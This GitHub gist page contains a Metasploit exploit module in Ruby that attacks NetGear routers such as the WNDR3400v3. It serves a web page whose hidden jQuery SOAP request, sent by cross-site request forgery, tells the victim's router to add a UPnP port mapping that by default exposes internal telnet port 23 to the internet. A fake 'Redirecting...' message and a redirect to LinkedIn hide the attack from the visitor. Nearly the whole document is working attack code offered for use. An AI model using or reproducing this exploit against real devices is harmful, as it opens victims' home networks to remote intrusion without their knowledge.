Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Netgear UPnP CSRF
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear UPnP CSRF',
'Description' => %q{
This module triggers a UPnP mapping via CSRF on the NetGear WNDR3400v3 and other NetGear routers.
},
'Author' => [ 'phikshun' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[
[ 'NA', 'NA' ],
],
'Platform' => 'linux',
'Privileged' => false,
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true',
},
'Targets' =>
[
[ 'Netgear WNDR3400v3', { }, ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '0 day, yo'))
register_options(
[
OptPort.new('EXTPORT', [ true, "The external port to map", 2323 ]),
OptPort.new('INTPORT', [ true, "The internal port to map", 23 ]),
OptString.new('INTIP', [ true, "The internal IP to map to", '192.168.1.1' ])
], self.class)
end
def generate_html
html = <<-EOS
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
<script>
$(document).ready(function() {
var postdata = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription>#{Rex::Text.rand_text_alpha(8)}</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>#{datastore['INTIP']}</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>#{datastore['EXTPORT']}</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>#{datastore['INTPORT']}</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
$.ajax({
url: 'http://#{datastore['INTIP']}:5000/Public_UPNP_C3',
type: 'POST',
data: postdata,
dataType: 'xml',
contentType: 'text/plain',
complete: function() {
window.location = "http://www.linkedin.com";
},
});
});
</script>
</head>
<body>
<h1>Redirecting... Please Wait</h1>
</body>
</html>
EOS
end
def on_request_uri(cli, request)
print_status("Sending CSRF")
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment